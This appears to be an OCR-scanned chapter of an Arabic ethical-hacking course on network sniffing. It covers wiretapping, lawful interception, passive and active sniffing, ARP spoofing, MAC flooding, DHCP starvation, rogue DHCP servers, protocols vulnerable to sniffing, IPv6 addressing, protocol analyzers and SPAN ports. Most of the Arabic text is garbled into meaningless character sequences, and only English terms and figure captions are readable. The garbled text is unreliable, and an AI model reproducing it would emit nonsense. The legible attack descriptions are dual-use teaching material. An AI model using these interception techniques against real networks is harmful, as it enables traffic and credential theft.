^Jc £ JJ^ali JaLuiJ L_fl jjoi S^a. jll £>i& Uiajl .4_L^j£3l A lajuLjj 1 g ^1 iklLoii j Sniffing AjjuLujVI ^xl&lLJl Jjuj JjUli jjoj jll 

(jjLalj a ^ i^jLuiaSI djLuaiillj CjIj^VI l o ^ jjuj t^iUi AiLJaVU .Sniffing cf^* uj-^ u' ^S^It cJ j3 jud ^ f^-* ^ ^ 

.I^Iia^V cilli j wireshark ^bVl (jc J> ^ jJj jll J jUli l_a LJajl .siLill jjj-^ ^j^- 



Si^ j]| ^ L^Lj^LLa ^jj <_i j-uj die- jJa 




(Sniffing Concept) Sniffing Jl Jj* V-^-Vl ^li-il 8.1 



Wiretapping 

^ di3 jiiVl jl ^l^SI cjt^U^JI aA\ 4l±xjijl\ yt> ( 4,ffilgJ t cjU2Ha2I ("unnl t) Wiretapping or telephone tapping 
J (^Sc c qn^^l jl c v^nn^l ^j^i^ uJl ^j^j ^lilc ( . ia>j V j! < Wiretapping Cy* ^— ^ ^^A 3 lM* 

gjill SjjWI (l^ o^jVI c> jl ^1 jJI tSj^Vl) (listening device) g^UL-VI jl*^ J^>jj 4^ ^ 'Wiretap 

< (access)Jj^j^ * (intercept)^ ' (monitor)^ j^i ^ ^ *^5lJ ^ asLj^<A\ s jl^VI <> 

.diVl^ajVl ^Uaj ^ dULJt (Js^j ^ Sjjl jll CjLd jIslxJ! (record) Jj> * ^ j 

(Wiretapping Methods) <^aHJt jjla 
;*UlUll Jjjlall J^Ia £)a £)) l^-aj 

The official tapping of telephone lines J^Jt J^- yr^J^ Su^uW 

The unofficial tapping of telephone lines c^jWyr^J c^iHH 

Recording the conversation ^1^*11 
Direct line wire tap s Jta* ^J^l Jc- Ci^iiill 

Radio wiretap < "i > ^n 



Wiretapping Jl £l jA 

< (access) J^jJI 4 (intercept)^^ ' (monitor)^^ UikJjj Jllj ^^11 Wiretapping c> u^j* 

.diVU^ajVl ^Uaj J CjULiJI (Js^j J s^jl jll CjL» jls^xJI (record) (Jj? ' ^ J 

Active Wiretapping i- 

^ j . (man-in-the -middle)^* jll J j ^>b Liajl l_a active wiretapping '^-^ dUlk^a J) JailW 

jl JJJiHI ^a^l ^-AuiJ ttilli Jl AiLjaVU ^Uaj J djUUJl jl JJJ-<Ji ^^P" (J*-^ cSjT* > uJ j AjSIjaJ till ^ajujJ 

Passive Wiretapping 

. (eavesdropping)^^! J (snooping) JalaSlI U-sjI ^j*j passive wiretapping dUlk^ J^L 

.l&Jc- ^ jl^j Jll cAiLiJ! Ai^stxJI l_jLoij£I jl jjj-<JI <aK Jc (snooping) 




Figure: Types of Wiretapping.

Active Wiretapping: it monitors, records, alters and also injects something into the communication or traffic.

Passive Wiretapping: it only monitors and records the traffic and gains knowledge of the data it contains.


( JJli (jiljjfct) Lawful Interception 

aj! j\ JjUMI jjUII 3 kLuJI <JjS ^ cjVL-ojVI djUUJI Jc; J jj^aJI Jl£j^l ^ Lawful interception (LI) 

^ajU^JIj (infrastructure management) ajI^I 4_mll s jtal Jia 3Ja^l J lJUII J s^iiia ^ ik&Vl c> ^ 
Uj jjis ajIc 4jSUj ^jjjLojVI J cjUUJI a<^A Jl J jj^a jll .(cyber-security-related issues) ULjaall j 

. law enforcement agencies (LEAS)uj^^^ CjVI^j c> CjUUxJI ^> ^j^l \^ ijiii 

jjP Jluu J^su Jll 4Jt j^ula2| CjI J12I £jj l^Jjbj ^jj Jll JjLuu jll J& ^jjxll f IjLV L££ Jal JpVI (> ^ Jll lib Jl A^U dllA 

,4 ftHa a ljUujV J Jli 

L— lAj L_S jjoj J jjUII (jialjJcVI ^ jill liA tillil LlujJJJ I^^J lS^*^ ^11*11 ^IaJI J 4_ijlA jVI <UaJdjVI dla^al ; JUdll cl^f^ Js- 

>L ^aljjc;VI ^^j^-V^ ^ ^ fJUll ^UJl J jI^LII /Lkj&Vt Jc^ jj*1I ^ILV U3 <jjau3U S^jli <j| 

.4_ifljlgJl djUJl^xJl Jc db gallll j& dfl jll J Jal I^cUjI ^aJ Jill (J Jail 
lM tiA jj^jj .Decision Computer Group i> f ^ Telco/ISP J <^jASll <-M 
^ jj^ j^- (j-^H tap/access cAj^JI X^o\ jj&I ^1 cjUUJI *Uj sjIc-V tap/access 

j^JI *Uj s^lolj <4u ^ E-Detective (ED) J> j^j IP domain c> ^ j^V 1 

FTP j P2P 'SMTP <IMAP J POP3 ^Vj^iijjj ^ t> s^L^ ^ «4Ji -J^^ W ^ ^ 

.(Centralized Management Server) CMS c> U^j^j <4j ED i-J^l <Telnetj 



^ jaJt ^ I'unnl l Packet sniffing 

I Wiretapping . jjj*^ cASliA <%flaj L^j) (wiretapping) cjUJI£-<JI ^^ic Cl ^jls1\ <jl£ ^ ajI^JI CjI^jJj <J1* 
J£ Jalisll j ^ Packet sniffing .(<* jaJI c^oSSS) Packet sniffing i> <^ cA<^l ^ 

segment ^ ^ . jW (application) ^l^ki^U jjc jaj ^1 CjUUJI ^ 

<j! t ; nyil ^^kjjoaj (_^ilt j dujjjj cijtaUaj < u,^h»j ^43^ ^ sniffing ^ .segment 1^ u^WL)^ uj^ Ait£j 

^^ja^JI jj^>^ ^^>^ ^jj sniffing ^^^^ o^** .lsj^$\ CjUa^xJI ^^>^- ^jjj t aj^u^u jl^. ^ » ^ 



Ciijiij liAj cJlj U Packet sniffing o^j switch" Ua.j1jj£j (> v^ .. n ^ jJI j! ^> ^ jll ^ 

^H^(router) j(server) ^ a^j^J ^ cjUj^ ^ remote sniffing ■!> ^ jt 

^j^. ialiiill ^1"^ aj ^Packet sniffing ^l-^^nlj j <Jaij ^ l^L^U a^j^- J jll j <jal^JU till ^joij Igi! .5-1^ 

'SMB SQL database ^Telnet authentication <HTTP Basic 'IMAP 'POP <IMAP traffic 'POP 'SMTP 

^UJal ^ ^>JI t> I^LUjII ^jII cjUUJI ^1 ja J^k ^> cjU jlx^l ^> Jj»^ll .FTP traffic 'NFS 

.(active transmission) Jajuiill Jill I < . uL^j 4_uii3l ^ o^cLui^ ^ 4_JUi ji&l CjIa^a ^jiii dlj£ _a<^i 

1£)JlaAH* noil ^ l)^) OH ^^1^1 ^i^- ("unnlb ^i^l j oil ^bS Aoio£J ^JLJlj J/mMI jA LuS 




Figure: sniffing on a switched network. Smith and Lena exchange data through a switch; the attacker receives a copy of the data passing through the switch.
AjjL u'susi Ia^a .J 



(Sniffing A Sniffing Threats 



http://www.webopedia.com : ja^JI 
Jc <Xc* jjJl<J! a intViVl J I^qIa^LujI (j^j Sniff ers .d^^l jjc cjULjJI jLoj .jj^jj ^jIj jl/ j ^Ujj j& Sniffer 

,a£jjoi3I Jc *^ ja. diLa jIslxJI <3jjaj t(JH<Jl cJ^f^ tA^-jjjaua JJ*-II a It.* <Nf I lg_x»l,jjkjjail Liajl (j£-ajj ajbj 6 JllxJl J-iJjuj 

4_g_^.lj tg-Lo Sjj lalL&H ~ I^JLujJ L^liJ t4-uiLuill IgJalajll CjULiJl ^jijj J^ljVI J^JJ 4_g_^.!j ~ iklLujJ ^» j^Jl ^'"^ (j-a LjaaJ 

^I^C-Vl dlljLlk j-o ^J^xJl ^a^J j o^Axld dal £JJJ Ljajj ^ ^<<\1 $ jjj^Jl <£jJ*« (jC ^^jLuJI ^juj^)1I > ^^jj ^La ^^JjoiaII 

J 2^^(laptop) J a jj ^1 ^ *^lc .4 m ^ <jc ja (jAxia j^JI cjLg jix-o ^ jjuj ialaiill a £ Packet sniffer 
Jc Packet sniffer ^-^j l^^A 3 j-*^ ^AxJI (jjiijjjuJI iaU* u^*^ ^<^*u Jj j j]| l_l ^ j j £>i& 




^SniffingJl J-^uLjS 

LAN ^-LaLq jj jjj^ jl^j> lS^ . (Ethernet) ^j^] ^^j^I J jjj^^ ^ j^> jjSVI <LjIa3l 

aI^IujI ^jj .l^jaiij a£jJo3I AiUaj Jc Igijj^j ^jjj a£jJo3I J(node) <J^ lS^-^ MAC j& j -o^ 

ja j^VI j .fUail! Jjj (> CjUUJI Jul "frame" ^ (Ethernet protocol) Jj^jj^ jj MAC u' 
( Ethernet header ) ^ jk\ J ( Data Link Layer ) ^AjIjJI <^ j ^^Luj .Cjllnkill c> ^ .IP 
(mapping) c> <Jj>^i ^ (Network layer) a^JI aIjL . ipjl jj& <> V^? ^j31 MAC u'j^ 

^ <j| dii^ . (Data Link Protocol)^^^ ^* j d^jtjjt ^ <jj!^ ja MAC IP u^j^ 

j Jt ^n ju^i ^3 lili . ARP cache J j^Ji ^ ^ *^ j 4 J ^> j^^ MAC u^j^ u° 
IP J jjill jl jixJI c^ 1 j (ARP Request) ^> ^ (ARP Broadcast) ARP ^ ^ 6 IPu'j^ c> 

11a j (IP) *^ jj^aLJI 4%j> j ^^j'^l l£ (Jc- Broadcast ^ j^^. J^-^VI ^jjj 

^ Unicast ^ jll uj^ ^ lA 3 ARP Replay lS^ ^ ^ o-^ 1 ^ 1 MAC ^ u 1 ^j^J! ^ ^ 

J 6 j^axJl jW^^ .(J^ry^l L^jJaa J ^ Jj^al jill ^jljl^aJ! lAl3 <Lj]a3| ciljjj j^a-<Jl jlgjaJU ^j^aLiJl ARP Cache 

.liA MAC ^ f ^"'"J '^-^ J 3 ^ ? ^ t° <j*Vl^ajl 
ljjjjj) ljLuj jH) (jjiA .CjUjJ) siA j£ J A hW\ * 4JLjiaj J-aau Sniffer ^ J 6 ^J-^j O- 4 (jt^uutuuj jl^ jj tilUA 

(Shared Ethernet) ^jli^l ^j^! *t 
tAliJI £>ja J .bandwidth <J^ u^ 1 * ^ g > j ^jiiaUjj j ^JalaJI ^jjaii Jc 3ilS -iajjjj tA£jiui<\31 lIujjjVI 4jjj J 

Jc^ Jjojjj -Uli <2 Jj Cjja^lb 1 <JVI JJJJ Ujjc < J^Lj .S^l j 5J!>U oil ^ jaJl Jjjj (Jj*?)t\ oj^Vl 

djjjj] J c£ J^-VI 6 J£J>VI ,4j <j-*alaJl jJj^axJl MAC ( ♦ 1 ^ > J 2 jW^^ (J-* 3 ^^ MAC ^^j^l 

. (Frame) j^V 1 J* 1 ^ ^ ^Ikij ^ lili .l^ij ^(frame) J Aj^j* 51 ^j 1 ' MACu* j^- ^ (4 3 ^t) 
CajjjjVI aId J Sniffing .(frames) J^Vl cfej s^lSIl ^ sniffer ^ lU^ ls^ £*j 
.hub sjj".. 1 -WL^ 6 ^ J .l^iLuuSI l-jxj gaj JUlLj 4 (l_a^JI 6jjujLix» (J>»Isijj V)passive <^-& 

Switched Ethernet *t 

J^ cSJ 1 ^ .Switched Ethernet cr^ 5 hub ^ i> Vjj <j£L>*!! Jj o^aJI l^a .Ljjjj Jll ^jV^ ajjj 

^jaJI ^aiaijj < MACu*j^ cs^ (Physical port) J*^ iaiall j < jjjjaaSII Sj^V MAC ajj^ ^ <y^N kfi^j 
6 oa _a£jjoJI Jc jj jjj^Sti 6 j^-^ ^j^t^ Ajjj V j Jaaa 4-$j> jll jj jjj^S Jj ci^j^ u^j^^ -U^*-* 

jj! jjsJI ^jja jll J NIC j ^^i^ 6 J^^j -cr^^^ c^ 0 ^ j ^-^^ bandwidth ^ '^liiaaVI (>ud^j 
^jc- lsUajj UUj cii^jj^a ) djlijj^ll jj^s u^^^ c> ^^"j V f j^JI (promiscuous mode) 

.Ujj^ ^ liA tcslli ^ j .sniffer 



j^Ut Jp l-uILuuVI ^hVi< nb (jL^-aII ^ 4 <>\n\\\ (jfe (sniffing) <**i«^^ti 'hub o-* lh^j^^ u- 4 ^ J^' J^ 

:Jl^t 

(ARP Spoofing) ARP Jl^t * 
jIjjc Jafla. ^jj jl^aJI c> ^ Jj^j ^ tj^ j^VI <jL^ J iajoijl ^ s uj^ ^ .stateless ARP 
J j^JI Jj ja. jll ^jj ^ j^l Sj^ ^ JL^jV! J JU J j3 ja. Arp Table Jj^ J ^ o 3 ^ 1 IP J) j MAC 

ARP Replay d^jW ^ ^ » mJJ j^a 4^ jaJ^ ^jjJa^Jl \±u IjA JJ jJJ^ll jW^ 1 13-^^ <jLaC Jj jj* ^^Ic ^ j 

jl£ j lis <j|jjc ip J! ^liJ! MAC u 1 *M ^f^ 31 J^ ^ ^ ^j^Vl (ARP Spoofing) jj> 

J) Aa.V JU jji3l (j\ JJ*J1 J^f*J j ARP -J! J J^ (Jj«^Jtjll UJ^ < — * ^ a^jjjli j Ail JJaJ -j) J-<JI j^aJl L_llia J^Lk ^ ^aJ ^ jjJa j-<Jl 

jl^a. Jj <jUila j AjUIjj JLujjU JjjJa^xJ! jl^aJl I^JJ I^A qaj lil a£j^3U o-^laJ! Gateway -Si uj^ ^ ^ J 31 j IP 

^IstJjai^ jjjjll Jj ^1 <jjjja II l^%a j Jj dAiljjj! b^£t> 4_ia. jj S.jIc.1 j& 4-1 (*J^ ^ cJ^ (jjJa^Jl Aja^U jJjjll j& 4-^^Sj (JjJa^xJl 

jjIxJI ciLaljjll <JS o^lji j o^aLuLq ^j-<i (jS-ojj l_a jjoj j ]VHT]VI Jj 6 <Jo^ J^^j 6 cJ^-^- ^-^-^ 

jl^aJ] jji3l ^jl jjxJl (jU obi UAt-d jj jjl! Jj ja^l jj j-d c . ilia cJ^J^ (J' c^ 41 ^ C3J^ j JJ jjll Jj (jjJa^xJl jl^aJl (j-a 

.<j ^-alaJl jl^aJl IP 1\ jA jjja^l 

MAC Flooding i- 

<j>jjj -L ^jjjjaJI Jc^ (Physical ports) iaUJI Jj MAC ^ ols^ ( l?^^ j^^ Jj^- J^ u^j^Ji 

laJLujj cJ*-?^ MAC Flooding o^j^^ lA^j ■^>^ , i JJ L * a j 1 u ^ W^!^ 'i 1 ^ 

V (jjJJJjJuJl ~y aJ Ja^ (^-aA jj Jl jjoiC (Jjjj^I Jc ^ ji^i jJl CjUliall L_flVl (J^J^ (j^O^ 3 U^J^^ J^V >JJ^I I^A 



< https://www.facebook.com/tibea2004 



615 



hub ^-^j L *° j 1 ^ ^ j ^— ^ failopen mode" ^£ cJ^-^j 4-^-3 'o^j^l Jl l^& ^— .^j^* 

clA^ V MAC Flooding .^j^? sniffing ^ clA^ <^ j .^^^xJ! Jc ialiall Jl ^pJI dii J^U. ^ 

. Jl£ Jji^ull ^Ikd <j^u3U Scapy ikJjj jl dsniff suite ^ J^ JJ> sbVl <macof ^1^1^ ls^jj Cj\ 

(Types of Sniffing Attacks) Sniffing ^Ua^ £t jj! 

jl <cjjjoui (Jj^j (jl Lftlj 6<£jjoJI Jc I^JLujjI ^jj Jll cAiUJ! Jc <J ^ai] a ikiLuajj 4<£jJa3l J j£ jjj^>j (JjI^j Jl j^Aj 'Sniffers 



c^UUJI s^IjS tdjLoj Sniffers 

^Viun A-ijij Sniffing .^1 < FTP^&JI j cjULJJI j j jjjSIVI ^jjJI j < J jj^WI J^jj lJ>^\\ J^Lsj j 

4_iLgc J ^ikla^Jl 4_ij£i3! Jc bLucI (JjlaJ l^j ^UaJl (j^J Sniffing ^ CjIa^A .4_i^Loj^l!l CjI£jJo3I £-^lj (J^j Jc- 

iSniffing ^1 jjVi Jj t^j ^1 jjl Jl < Vu^l cjU^JI jli ^Sniffing 




MAC Flooding - 

CjUUJ! jflis ^Jaii jllj CjUUJI ^ cAj\ > hjq j o^j^ lSj*^ J^j sniffing ^ ^jj MAC Flooding 

DNS Poisoning - 

.DNS j j^j^ i> C5^) cr^^ 4-A*xl\ ^ DNS Poisoning 

(3 ci^ (j^ < ^^ c ' Sjj-»J"^I ^ (j^ J ^V^^ ^—^3^^ 

ARP Poisoning 

a£ JLuj J ^ ^jauJal l IP jljjc ^ <j 4^UJI MAC ^W^^ ^ J ? ARP Poisoning 

.^VJl U IP aljk. jjjJI 

DHCP Attacks - 

j .CjU^SI (> jjo jj Jl DHCP ^ > ^J 

.CjUIIJI (> JLujjI (Jjja c> DHCP ajL^ ^ :DHCP starvation -1 

DHCP ^ J^"V rogue DHCP server ^1 ^l^ll ^ JiA J :Rogue DHCP server attack -2 

Jc J gaaJI (J^.1 (j>» a£jJJI DHCP ^^c- cijUlia <^Jl*-<J rogue server l!^*-^ ^aJ^JI a£jJo3I Jc ^jjJ^ 

^aLkSl JL^ajVI J jj^a j lU 3 *^ rogue server ci^ ^-^-a*^ ^^LJI CjUj jIscaII .a£jJo3I dibl^cl 

.DoS J ^ 
Password Sniffing - 

cAiUJ! L-iauuj j (JaiuS ^jI! jj^>^ '^j^- cJ^^ l>* ^jL^IS a£jjuJ ^^uin ^jII ^^A 3 j& Password sniffing 

j ;4£jJa3l ^^ic D^laJjaJl (jj^^l g all 6 ( - ll ^^ic <J jj^^JI Asu . JJJ>JI jjQ ujj tilil jjjjoull <ila CjLlgjjI j^. a I iklLujj 

;<jujL II ^1 J-^lj 6^^Jjoia3I CjULoi^. ^Jl (J jj^a jll clA^ 

(Spoofing Attacks) JjIajII cjU*a 

ji^j g-MUj cCjUUJI jjjjj c> uj^ oj^W ^ yr^ gr* Spoofing attack 

^I^JjujI (jjlA^lg^all / Q ^ a . ^ ^l-l^Jl dil _4jj^a^juo3l dlLa jlstxJl Jj^)jaiJ jl o^iLd ^jl j>» ^1 (J jj^a jll L-buA^a 

j £fil j>» ^Laulj 44_JUl^.VI ^jjl&lVI ^O^l cJ^-^J J^jV 4^jUIjlu^. Jl J jj^ jll <C jjjuu* jjc. <L^)IaJ 4_i^jJa3! JP <j| jjc 
j 4_i^Luj^l!l <J jj^ jll Jallj <LgIsI (Jj^l g a\\ (j^J Lft j tL-Lud^Jl <Jj > <al 9J j JjuJI CjI JiLd <jujL CjLg jl*-* <J jj^^J] 

Types of Sniffing: Passive Sniffing 



l^j^slxJI 11a sniffer ^— ^ c^^l ^Uaill ^ V^j c^^JI J lail] <^ ^<JI ^j^JI Jalislt I g i£ sj c _^j3I cjU^jj sb! Sniffer 
a£^JI cjjI£ AiUaj .promiscuous mode < qj > ^^ l ^Uaill AiUaj lS^j^ Sniffer .promiscuous mode 
^^jj jl sniffing t^UlUj ,c5 ^W^' CP 6 Wj f -^^^ ^-^3 promiscuous t^j^^ 

.promiscuous £^ j^^ <i ^i^l l ^JaiJI ^£±^1 <^l j <alkj j (Jjjla sniffers c> ^ l_a^JI ^IkJI C5 I^ 
isniffing (> O^jj A ^ Jj^ 0* sniffing tii^ill ^jl^ ^ UUjp) 

Passive sniffing 
Active sniffing 

packet fl^U fij ^ * .ojj^^^ c> <^ ? jaJI ^1 j^j Ja&L Jaia >JI jl ^ ^ jJaij V Passive sniffing 
t*S jiUI ^LuojII jlkj .(common collision domain) ^iji^JI ^^1^31 jUaj ia^ Ja*j I^a ^j^S U^j sniffer 
fjL-fljll jUaj .(hub c> JLk-ajl) bridged jl switched uj^ V c?^^ a£j^3I ^iLa (common collision domain) 
^^Luj ^j3I a£j^JI ^^i^j Passive sniffing .hub ^j^j-* uj^ ^ s ^ (common collision domain) ^ji^ll 

Jaliiill lW^I ■ jjj - ^^ ^^>^ cJ^ ^jj ^^^1 (jg& yjf Q .y ^-ia^J j^-dj tcjl^jjaJI JiL<i ^ _i^i<Jaj| Jaj^)3 hub 

.Passive sniffing ^l^i^U hub ^ 
iPassive sniffing ii2 & <-i^ C^J^ oK 1 ^" lt* 



Figure: passive sniffing (attacker).



;Ai^L haII 4 hi It S nil (jfe Jj^a^U Ua S jj£i*il Passive sniffing < jj^ * c&j^ CP 
(5-JaiJI jjill j-fllauiVl c^j) cf^Ull c>VI (jl ji^l ^jWiun lil :Compromising the physical security 



2^ ^^JJ^ 3 (1 



.(sniffing) t *i > *Vnl t s j^a Cinj Aa jj^l ^Jax^ :Using a Trojan horse 



packet sniffer ^ ^ ^ j^ > ^ l Jl^ Jl jlkl ^ j^aj b aS1 jlkV <±auJa] | jl^ ^ 4j^aJI sniffing ^1 

.sniffing pl^j 
qii ^^jouj^)]! (j^>i3l _^^£Lq jj jjj^ cjI^jjuj jl^a. (switch) (j^jjujli .hub u^o^l ^l^VunU ajj^JI CjI^jjuJI ^]\* a 

switch (J ls* 'line mapping j lA- l£ J) ^AjIjJI J^k Jfcj ^ jL hub (J ^switch j hub 

(Jjjj ^jiiljjjaJI t^UlUj jUa^ll m\a\\ cAjUJI J^jj j ttilli J^Lk ^ (Frame) j^-M cJ^ -Wo^l MAC Cft 

.active sniffing <Jko^ j& sniffing ^ JIjj V ^j^JI .passive sniffing 
.active sniffing (significant stealth advantages) jt^l y > passive sniffing :<Ua*5L 



Types of Sniffing: Active Sniffing 

^f^' jj^ c&j^ c> switched LAN J jjj^ ^ sniffing j^Ai Active sniffing 

V switched Ethernet 'Active sniffing -SI J c> sniffing J! Active sniffing .'M^ 

uj^j lA passive sniffing .hub is^ill ^ JUJI j* U£ LAN j lS^j ^ <*-^ CjUjkJI 

ajUlII L_u«j^a3l ^ j ^I^JI £>i& ^jc c ajuo£jl J^juJI Qjok -( j2jjjjjaJI Jc <Ajli3l a£jJo3I Jc djljUJI Jc (sniffing) ^^Yfll tj^S 

.sniffing c> ^ ^ 

(illilj ^AjjujlixJI jll tgiaj l>^j 'u^j^^ c)^ cl^ c — ^-^ j^j J v cl^j^ c ' u^^* ^jj Vjl 'Active sniffing J 

^content addressable memory (CAM) J ^ o- 3 ^ ARP cache -Maj ^j^JI . jjjJI a£ JalSjII j ^j^JI 
^Jajj CjU» jIslxJI 1^.L Sniffer L l} l ^ <J^3 cJ^^- cJ? 1 "> c^^^ SjSlill ^ ^j-alA ^ jj 11a j 

;s witch i_s^- A^jjuj C5 ic ^^>^ (j^alj^icV sniffing c)^ ^ ^ a 1 ^ ^ ^ CjLu^ill (j^asu ^^Jj Uua 
MAC flooding 
ARP spoofing 
DHCP starvation 
MAC duplicating 

Active sniffing -OiA^t (> ^j^it (*>^t ^1 J^j^ V Passive sniffing 'sniffing u a 1 ^^ 

(Protocols Vulnerable to Sniffing) c^ajull h^jp cjVj^jjx 

; jjoJI CjIaK ^^ic J jj^a^Jl diV j£ jJ jjJl i>i& ^^ic db^alill ^aJJ S^lc j .Sniffing CjV j£ jJ JjJl (^li 

^1 ciUi ^ Uj tl^Ll^ fjj U£ I^LISjII jSaj ^^kl^JI JjS ^> ^jjILJI cjUj^ ,sniffing :Telnet and rlogin 
4_JjUi ^^ic (real-time viewer) jJl ^ ^aUIxJI (jl I^a . - ^-^i ^aIjj iajjjalU Ia^Uj 

CjUK ^LuiVl aS^U^JI pHUi jJI ^Vit^ .CjI >j3I ^> ^jAxJI I^jJ HTTP c> cr^^ J^^^ jl^V^ :HTTP - 

c?a SNMP jj^l ^LJS JUj] ^ ^ .j^ ,>! -tpl ^jj V SNMPvl <j1 'SNMP a£j^ :SNMP - 

.4^1. nit JJ^ ^cjJal j (J-oj J djUUjll j JJJ^\ CjUK JLojjI iNNTP 
^jc. ^jJalj (j^aj dAiUillj JJJ-<Ji 1 - ^ ^ J^jj ^3 [POP 

CjUUJIj CjUK JLoijI :FTP - 
(Tie to Data Link Layer in OSI Model) OSI £^ J cjULuII J^jj *Lk> LiSjj U 
* y± l£ . j*^ plj^t J) yr^ j ^VU^il ^Uaj l^pl OSI model (the Open Systems Interconnection model) 

>* jUaj l$J^ OSI 4hlal\ CjL^aJI Jjj j AjjlxJl AifSall diU^Jl ^pflj J AifSa j£ ciljL£5 j .(layer)^^ f^J ^J*^ 

tilaj CjULiJI ^ jjjiJjj/ j^jj ^jj tAifkll J . OSIj^ 4_ijU3l Aifkll (Data Link layer) ^—^-^ lS^ 3 ji AiJa 

.cjUUJI Jjj^s jj <LL ^ ^ j^JI ia£iL Sniff ers .Bits Jj ^ 
Jc-I J *^ j^. CjUi^kJIj cijllnJajli Jla ^c.| jilL ^jiili V l&jl . OSI^ ^-^W J Sniff ers 









Figure: where a sniffer sits in the OSI model. Two stacks (Application, Presentation, Session, Transport, Network, Data Link, Physical) are joined by physical links. The initial compromise is at the Data Link layer; from there the attacker reaches IP addresses at the Network layer and the compromised application stream at the Application layer (protocols/ports such as POP3, IMAP, IM, SSL, SSH).

.CjI^I j3! clc j jll ^1 jll q\ jixll ciij 128 ^^lun (IPv6 address) o^HJI jl^^y! cLujjjVI (Jj^jj jjijS^ 

'.^j i> IPv6 J^Vl ojj^ 

jll Jl l^uLu ^aii unicast i> u'j^ J' W^j' ^ <u>Jl .s^lj <^>jl ^j~> j^j :Unicast 

l^ul^j <jla Any cast i> u'j^ ^ <^>JI .cjI^IjII <> jx^J lJ*j*^ Jj jjAj : Any cast 

. (routing protocol)^ j^t Jj^jjj .uL^ Iao^ ^1 l_j jSVl i^ljil Jt 

(4j ^ Multicast c> utj^ Jt U^^j^ ^ cs^' ^>JI .cjI^IjII ^> jx^J lJj*^ Jl jjAj Multicast 

ji*Jl lA^Aa. jll ^ixt^J 1^-xuL uJ 

j^(site-local) '(link-local)(J^ uj^ unicast 'ojj^I j^Vl ci 1 *^ 

Any cast ^j*^ & ' J^Wj .unicast c> Any cast ojj^ ^ s ^ .(global)^^ 

.Anycast u'j^ u^s c?^^ unicast c> u'j^ 
- (Broadcast messages)^ J^^j ^ ^Vmn V IPv6 jt^V) 






Figure: IPv6 address formats.

Link-Local: FE80 prefix (10 bits), zeroes (54 bits), interface identifier (64 bits).

Unique-Local (ULA): FC00 prefix (48 bits), subnet id, interface identifier (64 bits).

Global: 2000:: prefix (3 bits), TLA ID (13 bits), RES (8 bits), NLA ID (24 bits), SLA ID (16 bits), interface identifier.

Multicast: FF00 prefix (8 bits), flags (4 bits), scope (4 bits), interface identifier.

Figure: IPv4 header versus IPv6 header. Legend: field name kept from IPv4 to IPv6; fields not kept in IPv6; name and position changed in IPv6; new field in IPv6.

(Hardware Protocol Analyzers) JjSj^jj^I S 

4_^jjjui Jjiisu qj^ CjIjLujVI JatfljlV IjojIjojI ^AaJLujJ j ,a£jjoJI JjJ-aJl ^^>^ JJJ^ J Jua ^ g <J J^>^ cSj^* ^3^' 

AIAaH CjU^ (jc 4_^jU3I <JJ±kjj a£jjoJI JJ^ ^^>^ J ^j/Ml ^l.^l ml <JSl^<J ^Lal^Viml . JjJ-<Ji ^^>^ 

Agilent N2X N5540A i- 

.s jfa.Vl j cjU^kJI sj^aiift d^itnll pi J ji^jll t*ll ^joij ^jll j iaUJI jUikl flkj Agilent N2X N5540A 







Agilent E2960B + 

<xl6 link widths c> XI ^ Jj£ jjjjj lU^ j ^13^ j jUik^U ^^ki^j sbi ^ Agilent E2960B 




RADCOM Prism UltraLite Protocol Analyzer * 

> j W j& troubleshoot j ^13 RADCOM Prism UltraLite Protocol Analyzer 
JjSjjjjj > j 'Prism UltraLitej LAN/WAN/ATM cAS^S J JjSjjjjj JL^ y> ^ill <PrismLite t> 

oj Jl^ll 11a J ikUj .CjV j£ jjjjJI <xjujIj <^ j*->* j^-^V fiNU ^^klaij .WAN/Fast LAN r '^y : ^ 

.TCP/IP ^ c> ^ 




FLUKE Networks OptiView® Network Analyzer *k 

^ JL^jIj J£ tSj^Vl c> * l£ ^ FLUKE Networks OptiView® Network Analyzer 

djl^j^ill ^ 4£jJo3I AjLl^. (jc !>Liaa 4£jJo3! J^nlaj] e-hVl J^- 4 ^* <J^J J CjIj^VI . JL^aliVl 
FLUKE Networks Etherscope tm Series II Network Assistant «t 



^cLuj .wireless LAN 802.11 j Gigabit LAN Jl*- J» Fluke ES2 Etherscope Network Assistant 

^ o^cLoixi ^ jjill C5 ic LAN 




RADCOM PrismLite Protocol Analyzer <4 

^1 jj^ll j lSJ^ j ^ij3 tdl ^uo£i sbt j& Jj CjSj ^ATM j 'LAN 'WAN jW 1 ^ PrismLite fj* > ^ ^ 

_a£jj^3I j t^l laijl jj^ A£fxi3l djU^k ^^Ic JaU^JI til^Laij Igil .LAN/WAN 
SPAN Port 



j* j ' [Switched Port Analysis] SPAN port mirroring j^uo^ cAZ JjS L^i <ul& jlkj j SPAN 
u!^ 6 port mirroring u^-^ f^. LqaIc- ^^j/MI ^^ic Igj ^-^^a^ J jj^a jll ^jWill j ^HxkVl j > ^ill j 

jn^^i iflU^ _(jjiijjjuJ! ^^Ic iaaa j jl ^ild tilLiA (Jj^j (jl i5*-f^ o^j 6 j-*^ j v <^1U& (Jj^j q\ .a£jjuJI JI^g 

^fl IDS < : \fi f U^J 2 yr^ Cljl^^j^il Ay Ah jSS .„(>5SI ^llfi. t aKo <jj J AjjouIU 4J Attkjll L-JJatJt £ jjll li* IxjL 

(JjAj tl^Jc Sniff j >*\l 5-^1^3 l^j^jJj 
SPAN ^ffi gUjkg* ^jUjt J juu 
Source Port -1 

Transmitted (Tx) jl received (Rx) o^j^JI y-i <*>JI J±lL^ ^ill cjjjJI y> j monitored port 

^ J VLAN multiple SPAN sessions ^ 
j' Physical Port ji Routed Port c> u^j cjUjjj^JI ^> SPAN Source Port uj^ ^ 

.Etherchannel Port J Trunk Port J Access Port J Physical Switch Port 

VLAN Filtering -2 

VLAN f N ^^" <<< Ujli li^Jj o^j^JI ^ VLAN cJ^ Uj^al jjs) AJli Trunk Port -J , ^ a j ^ ^•^c 

voice J trunk ports VLAN Filter ^^i^l 'Trunk Port J ^ ^^^i Filtering 

VLAN ports 

VLAN ID ja Ua source interface uj^j VLAN J* ^ > VSPAN iSource VLAN 

source VLAN uj%^ ' j destination port * jf^j ^jjj ^ 

Destination Port -3 

(jl Llj > >n V j l^Lal^ j ^1 ALfllauJl j <Loj^<Jl jj^Jl dA£^)^/ c - il qq, V^l (j-d A^joij (JjViunui (_^i3l djUUJ] c_jal^<Jl CjjjJI j& 

' CDP< VTP' STPJ^ Layer 2 protocols cjVj^jj jjJ <jUiJ J Jx^ ^jL Vj source port jj^ 

. PagP'DTP 

